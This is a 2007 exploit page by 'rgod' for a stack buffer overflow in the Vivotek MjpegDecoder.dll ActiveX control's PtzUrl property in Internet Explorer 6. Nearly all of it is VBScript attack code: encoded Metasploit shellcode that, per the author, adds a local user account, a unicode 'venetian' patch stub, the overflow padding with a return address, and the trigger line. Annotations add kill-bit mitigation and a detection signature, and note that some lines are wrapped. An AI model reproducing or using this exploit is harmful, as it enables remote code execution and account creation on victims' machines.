




2007-06-03 Vivotek Motion Jpeg Control (MjpegDecoder.dll 2.0.0.13) Remote Exploit
Rated as : High Risk

<!-- IE 6 / Vivotek Motion Jpeg Control (MjpegDecoder.dll 2.0.0.13)
remote buffer overflow exploit / win 2k sp4 en version
by rgod
site: retrogod.altervista.org

software site: http://www.vivotek.com/
"VIVOTEK INC. is a leading IP surveillance camera and Network
camera firm specialized in IP camera, Wireless network camera,
IP surveillance camera"

some notes,
the PtzUrl property is vulnerable to a stack based buffer overflow
we are in control of EIP, ESI, EDI and EBP, *all* through UNICODE
expanded strings
I used the "venetian method" to fully patch the shellcode
This works from remote (about 2 times out of 3) or by dragging the html file
into the browser window, not by clicking it

Object safety report:

RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False
-->
<HTML>
<!--
  Proof-of-concept page for the PtzUrl stack overflow described in the
  header comment above. Per the author's object safety report the control
  is registered as safe for scripting and safe for initialization but does
  not implement IObjectSafety, so any web page can instantiate it and set
  PtzUrl without prompting.
  Mitigation on affected systems: set the ActiveX kill bit for the CLSID
  below (or remove/update MjpegDecoder.dll 2.0.0.13) so Internet Explorer
  refuses to load the control from web content.
  Detection: a page that instantiates this CLSID and assigns an unusually
  long PtzUrl value is the signature to look for in proxy / IDS content
  inspection.
-->
<!-- the vulnerable control; this CLSID is the value to kill-bit and to alert on -->
<OBJECT classid='clsid:EAA105FE-7BBD-4196-8B96-D46743894195'
id='MjpegControl' ></OBJECT>
<script language='vbscript'>

' NOTE(review): in this extraction several statements are wrapped onto two
' physical lines (the FRAGMENT assignment, the REM comments after C5 and C6,
' the REM after eip, and the suntzu assignment). VBScript needs a trailing
' "_" to continue a statement, so the listing is not runnable as printed;
' read it as the author's listing rather than a verbatim file.

' metasploit one, alpha2... add a user 'sun' with pass 'tzu'
' Payload as described by the author: it adds a local account, i.e. it is
' arbitrary code running with the privileges of the browsing user.
FRAGMENT =
unescape("%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%71%40%71%40%71%40%71%40%71%40%72%40%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%eb%59%05%f8%ff%49%49%49%49%49%49%49%49%49%51%6a%58%30%31%42%42%78%42%42%41%30%41%50%42%75%39%6c%48%44%70%70%50%4b%35%6c%4b%6c%65%58%31%6f%4b%6f%38%4b%4f%70%61%6b%69%6b%34%6b%51%6e%31%70%79%6c%64%30%64%37%31%7a%4d%51%72%6b%54%4b%34%44%64%65%45%6b%4f%44%31%6b%66%4b%6c%6b%4b%6f%4c%71%4b%4b%4c%6b%51%4b%79%6c%54%74%73%61%50%64%4b%70%50%75%70%58%6c%4b%50%6c%6b%50%6c%4d%6b%38%48%4b%79%6b%30%50%70%30%70%4b%78%4c%6f%41%46%50%46%69%58%53%70%6b%50%48%6e%38%72%53%38%78%4e%6a%4e%37%6f%47%73%6d%44%4e%35%38%45%50%6f%43%30%4e%45%34%30%55%33%75%42%70%43%65%4e%50%54%58%35%70%4f%61%44%34%50%56%56%50%4e%55%64%50%6c%6f%63%51%4c%47%72%6f%75%70%30%71%44%6d%49%6e%79%73%74%62%41%64%6f%62%63%50%33%65%4e%50%6f%71%34%74%50%c3")

' C1..C6 and CODE below are the author's in-place patch stub ("venetian
' method", see header); the author's REM notes give the intended meaning.
c1 = unescape("%95")                : REM xchg eax, ebp
C2 = unescape("%6e%05%ff%02")       : REM add eax 0200ff00h
C3 = unescape("%6e%2d%12%02")       : REM sub eax 02001200h
C4 = unescape("%6e%40%6e")          : REM inc eax
C5 = unescape("%80%90%6e%40%6e%40") : REM add byte ptr eax 90 ,
inc eax twice
C6 = unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") : REM and again ... add
byte ptr esi works as nop

CODE = C1 & C2 & C3 & C4 & C5 & C6 & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%03%6e%40%6e%40") & _
unescape("%6e%80%eb%6e%40%6e%40%6e%80%e8%6e%40%6e%40") & _
unescape("%6e%80%ff%6e%40%6e%40%6e%80%ff%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%49%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%49%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%49%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%49%6e%40%6e%40") & _
unescape("%6e%80%37%6e%40%6e%40%6e%80%5a%6e%40%6e%40") & _
unescape("%6e%80%68%6e%40%6e%40%6e%80%50%6e%40%6e%40") & _
unescape("%6e%80%41%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%6b%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%42%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%41%6e%40%6e%40%6e%80%58%6e%40%6e%40") & _
unescape("%6e%80%38%6e%40%6e%40%6e%80%42%6e%40%6e%40") & _
unescape("%6e%80%6d%6e%40%6e%40%6e%80%69%6e%40%6e%40") & _
unescape("%6e%80%4a%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%57%6e%40%6e%40") & _
unescape("%6e%80%35%6e%40%6e%40%6e%80%6c%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%55%6e%40%6e%40") & _
unescape("%6e%80%4c%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%46%6e%40%6e%40%6e%80%32%6e%40%6e%40") & _
unescape("%6e%80%33%6e%40%6e%40%6e%80%48%6e%40%6e%40") & _
unescape("%6e%80%6c%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%72%6e%40%6e%40%6e%80%4c%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%75%6e%40%6e%40") & _
unescape("%6e%80%76%6e%40%6e%40%6e%80%58%6e%40%6e%40") & _
unescape("%6e%80%52%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%50%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%55%6e%40%6e%40%6e%80%58%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%6b%6e%40%6e%40") & _
unescape("%6e%80%4e%6e%40%6e%40%6e%80%6c%6e%40%6e%40") & _
unescape("%6e%80%6e%6e%40%6e%40%6e%80%6f%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%33%6e%40%6e%40") & _
unescape("%6e%80%6f%6e%40%6e%40%6e%80%4b%6e%40%6e%40") & _
unescape("%6e%80%44%6e%40%6e%40%6e%80%65%6e%40%6e%40") & _
unescape("%6e%80%6b%6e%40%6e%40%6e%80%38%6e%40%6e%40") & _
unescape("%6e%80%4a%6e%40%6e%40%6e%80%77%6e%40%6e%40") & _
unescape("%6e%80%36%6e%40%6e%40%6e%80%76%6e%40%6e%40") & _
unescape("%6e%80%56%6e%40%6e%40%6e%80%51%6e%40%6e%40") & _
unescape("%6e%80%4a%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%66%6e%40%6e%40") & _
unescape("%6e%80%43%6e%40%6e%40%6e%80%48%6e%40%6e%40") & _
unescape("%6e%80%50%6e%40%6e%40%6e%80%6c%6e%40%6e%40") & _
unescape("%6e%80%36%6e%40%6e%40%6e%80%62%6e%40%6e%40") & _
unescape("%6e%80%6c%6e%40%6e%40%6e%80%33%6e%40%6e%40") & _
unescape("%6e%80%55%6e%40%6e%40%6e%80%67%6e%40%6e%40") & _
unescape("%6e%80%7a%6e%40%6e%40%6e%80%4c%6e%40%6e%40") & _
unescape("%6e%80%75%6e%40%6e%40%6e%80%4e%6e%40%6e%40") & _
unescape("%6e%80%75%6e%40%6e%40%6e%80%4a%6e%40%6e%40") & _
unescape("%6e%80%4f%6e%40%6e%40%6e%80%43%6e%40%6e%40") & _
unescape("%6e%80%77%6e%40%6e%40%6e%80%67%6e%40%6e%40") & _
unescape("%6e%80%4b%6e%40%6e%40%6e%80%55%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%30%6e%40%6e%40") & _
unescape("%6e%80%6c%6e%40%6e%40%6e%80%43%6e%40%6e%40") & _
unescape("%6e%80%66%6e%40%6e%40%6e%80%6f%6e%40%6e%40") & _
unescape("%6e%80%6b%6e%40%6e%40%6e%80%32%6e%40%6e%40") & _
unescape("%6e%80%66%6e%40%6e%40%6e%80%4c%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%46%6e%40%6e%40") & _
unescape("%6e%80%6e%6e%40%6e%40%6e%80%42%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%6e%6e%40%6e%40%6e%80%45%6e%40%6e%40") & _
unescape("%6e%80%54%6e%40%6e%40%6e%80%7a%6e%40%6e%40") & _
unescape("%6e%80%37%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%4b%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%53%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%4c%6e%40%6e%40") & _
unescape("%6e%80%71%6e%40%6e%40%6e%80%77%6e%40%6e%40") & _
unescape("%6e%80%53%6e%40%6e%40%6e%80%47%6e%40%6e%40") & _
unescape("%6e%80%6b%6e%40%6e%40%6e%80%73%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%6a%6e%40%6e%40%6e%80%4d%6e%40%6e%40") & _
unescape("%6e%80%4b%6e%40%6e%40%6e%80%61%6e%40%6e%40") & _
unescape("%6e%80%30%6e%40%6e%40%6e%80%32%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%4e%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%32%6e%40%6e%40") & _
unescape("%6e%80%55%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%4b%6e%40%6e%40%6e%80%4e%6e%40%6e%40") & _
unescape("%6e%80%64%6e%40%6e%40%6e%80%46%6e%40%6e%40") & _
unescape("%6e%80%59%6e%40%6e%40%6e%80%7a%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%30%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%66%6e%40%6e%40") & _
unescape("%6e%80%55%6e%40%6e%40%6e%80%64%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%67%6e%40%6e%40") & _
unescape("%6e%80%54%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%72%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%74%6e%40%6e%40") & _
unescape("%6e%80%71%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%74%6e%40%6e%40%6e%80%61%6e%40%6e%40") & _
unescape("%6e%80%53%6e%40%6e%40%6e%80%35%6e%40%6e%40") & _
unescape("%6e%80%53%6e%40%6e%40%6e%80%31%6e%40%6e%40") & _
unescape("%6e%80%72%6e%40%6e%40%6e%80%57%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%72%6e%40%6e%40") & _
unescape("%6e%80%54%6e%40%6e%40%6e%80%65%6e%40%6e%40") & _
unescape("%6e%80%36%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%50%6e%40%6e%40%6e%80%67%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%37%6e%40%6e%40") & _
unescape("%6e%80%77%6e%40%6e%40%6e%80%37%6e%40%6e%40") & _
unescape("%6e%80%72%6e%40%6e%40%6e%80%33%6e%40%6e%40") & _
unescape("%6e%80%31%6e%40%6e%40%6e%80%77%6e%40%6e%40") & _
unescape("%6e%80%50%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%73%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%30%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%30%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%33%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%42%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%50%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%31%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%31%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%71%6e%40%6e%40%6e%80%57%6e%40%6e%40") & _
unescape("%6e%80%74%6e%40%6e%40%6e%80%61%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%57%6e%40%6e%40") & _
unescape("%6e%80%64%6e%40%6e%40%6e%80%53%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%63%6e%40%6e%40") & _
unescape("%6e%80%75%6e%40%6e%40%6e%80%90%6e%40%6e%40%6e%40%6e")

' Overflow layout, as the author describes it: 262 filler characters, then
' the value that overwrites EIP (author's REM: call edi in comctl32, located
' with msfpescan), then the stub and the payload. The filler length and the
' address are specific to MjpegDecoder.dll 2.0.0.13 on the author's
' win 2k sp4 en test system (see header), which is why the author reports
' it as unreliable from remote.
bof         = string(262,unescape("%12"))
useful_junk = unescape("%12%12%12%12") 'not touch
junk        = string(32,unescape("%12"))
eip         = unescape("%23%7d") : REM 0x007d0023   call edi, 
module comctl32 found with msfpescan
suntzu      = bof + eip + useful_junk + junk + CODE + FRAGMENT +
string(16,unescape("%90"))

' Trigger: assigning the oversized string to PtzUrl overflows the stack
' buffer. For defenders this assignment (CLSID above + a very long PtzUrl)
' is the observable signature; kill-bitting the CLSID prevents the control
' from being created by web content in the first place.
MjpegControl.PtzUrl = suntzu

</script>
</HTML>

